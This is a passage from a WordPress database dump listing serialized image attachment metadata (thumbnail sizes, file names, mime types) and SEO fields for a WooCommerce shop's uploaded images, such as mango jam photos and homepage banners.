"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-3-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-3-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1999,598,'_wp_attached_file','2022/01/14-2.png'),(2000,598,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:517;s:6:\"height\";i:396;s:4:\"file\";s:16:\"2022/01/14-2.png\";s:8:\"filesize\";i:269864;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"14-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119452;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"14-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18016;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"14-2-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4551;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"14-2-300x230.png\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"14-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"14-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"14-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"14-2-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"14-2-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2010,602,'_wp_attached_file','2022/01/images-3_CnyokaDvJmG1xu-e1643111041327.png'),(2011,602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:239;s:6:\"height\";i:70;s:4:\"file\";s:50:\"2022/01/images-3_CnyokaDvJmG1xu-e1643111041327.png\";s:8:\"filesize\";i:5026;s:5:\"sizes\";a:9:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643111041327-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1935;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:48:\"images-3_CnyokaDvJmG1xu-e1643111041327-50x15.png\";s:5:\"width\";i:50;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1563;}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643111041327-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-320x138.png\";s:5:\"width\";i:320;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-320x138.png\";s:5:\"width\";i:320;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643111041327-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:48:\"images-3_CnyokaDvJmG1xu-e1643111041327-48x14.png\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:48:\"images-3_CnyokaDvJmG1xu-e1643111041327-48x14.png\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2013,602,'_wp_attachment_backup_sizes','a:15:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:366;s:6:\"height\";i:138;s:4:\"file\";s:27:\"images-3_CnyokaDvJmG1xu.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-150x138.png\";s:5:\"width\";i:150;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-320x138.png\";s:5:\"width\";i:320;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-320x138.png\";s:5:\"width\";i:320;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"images-3_CnyokaDvJmG1xu-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:33:\"images-3_CnyokaDvJmG1xu-48x18.png\";s:5:\"width\";i:48;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:33:\"images-3_CnyokaDvJmG1xu-48x18.png\";s:5:\"width\";i:48;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"full-1643111041327\";a:3:{s:5:\"width\";i:239;s:6:\"height\";i:70;s:4:\"file\";s:42:\"images-3_CnyokaDvJmG1xu-e1643110898919.png\";}s:23:\"thumbnail-1643111041327\";a:4:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643110898919-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:43:\"woocommerce_gallery_thumbnail-1643111041327\";a:4:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643110898919-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"shop_thumbnail-1643111041327\";a:4:{s:4:\"file\";s:49:\"images-3_CnyokaDvJmG1xu-e1643110898919-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"thaps-thumb-img-1643111041327\";a:4:{s:4:\"file\";s:48:\"images-3_CnyokaDvJmG1xu-e1643110898919-48x14.png\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"taiowc-thumb-img-1643111041327\";a:4:{s:4:\"file\";s:48:\"images-3_CnyokaDvJmG1xu-e1643110898919-48x14.png\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2074,613,'_wp_attached_file','2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-.webp'),(2075,613,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1300;s:6:\"height\";i:866;s:4:\"file\";s:122:\"2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-.webp\";s:8:\"filesize\";i:53554;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--320x320.webp\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14888;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2906;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:120:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--50x33.webp\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:748;}s:6:\"medium\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/webp\";}s:5:\"large\";a:4:{s:4:\"file\";s:123:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--1024x682.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--768x512.webp\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--320x320.webp\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--600x400.webp\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/webp\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:122:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:120:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:120:\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2078,614,'_wp_attached_file','2022/01/images.jpg'),(2079,614,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:18:\"2022/01/images.jpg\";s:8:\"filesize\";i:10684;s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"images-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4368;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"images-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1700;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"images-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"images-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:16:\"images-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:16:\"images-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:17:\"images-225x64.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2093,616,'_wp_attached_file','2022/01/images-1.jpg'),(2094,616,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:411;s:6:\"height\";i:122;s:4:\"file\";s:20:\"2022/01/images-1.jpg\";s:8:\"filesize\";i:6221;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"images-1-320x122.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6442;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"images-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2044;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"images-1-50x15.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:639;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"images-1-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-150x122.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"images-1-320x122.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-1-48x14.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-1-48x14.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2096,618,'_wp_attached_file','2022/01/home-02-1.png'),(2097,618,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2926;s:6:\"height\";i:1367;s:4:\"file\";s:21:\"2022/01/home-02-1.png\";s:8:\"filesize\";i:7311162;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"home-02-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:148295;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"home-02-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16575;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"home-02-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2551;}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"home-02-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"home-02-1-1024x478.png\";s:5:\"width\";i:1024;s:6:\"height\";i:478;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"home-02-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"home-02-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"home-02-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"home-02-1-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"home-02-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"home-02-1-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"home-02-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"home-02-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"home-02-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2098,616,'_edit_lock','1643113828:1'),(2099,616,'_edit_last','1'),(2100,616,'_aioseo_title','#post_title #separator_sa #site_title'),(2101,616,'_aioseo_description','#attachment_caption'),(2102,616,'_aioseo_keywords',''),(2103,616,'_aioseo_og_title',NULL),(2104,616,'_aioseo_og_description',NULL),(2105,616,'_aioseo_og_article_section',''),(2106,616,'_aioseo_og_article_tags',''),(2107,616,'_aioseo_twitter_title',NULL),(2108,616,'_aioseo_twitter_description',NULL),(2109,619,'_wp_attached_file','2022/01/home-0111.jpg'),(2110,619,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:280;s:4:\"file\";s:21:\"2022/01/home-0111.jpg\";s:8:\"filesize\";i:77149;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"home-0111-320x280.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22214;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"home-0111-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3799;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"home-0111-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1044;}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"home-0111-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"home-0111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"home-0111-320x280.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"home-0111-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"home-0111-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"home-0111-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2111,619,'_edit_lock','1643113758:1'),(2112,620,'_wp_attached_file','2022/01/169d48431c0c3a65dbf43d3a8a428774.jpg'),(2113,620,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:714;s:6:\"height\";i:260;s:4:\"file\";s:44:\"2022/01/169d48431c0c3a65dbf43d3a8a428774.jpg\";s:8:\"filesize\";i:24998;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-320x260.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10321;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1813;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:42:\"169d48431c0c3a65dbf43d3a8a428774-50x18.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:18;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:807;}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-320x260.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-600x218.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:44:\"169d48431c0c3a65dbf43d3a8a428774-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:42:\"169d48431c0c3a65dbf43d3a8a428774-48x17.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:17;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:42:\"169d48431c0c3a65dbf43d3a8a428774-48x17.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:17;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"cop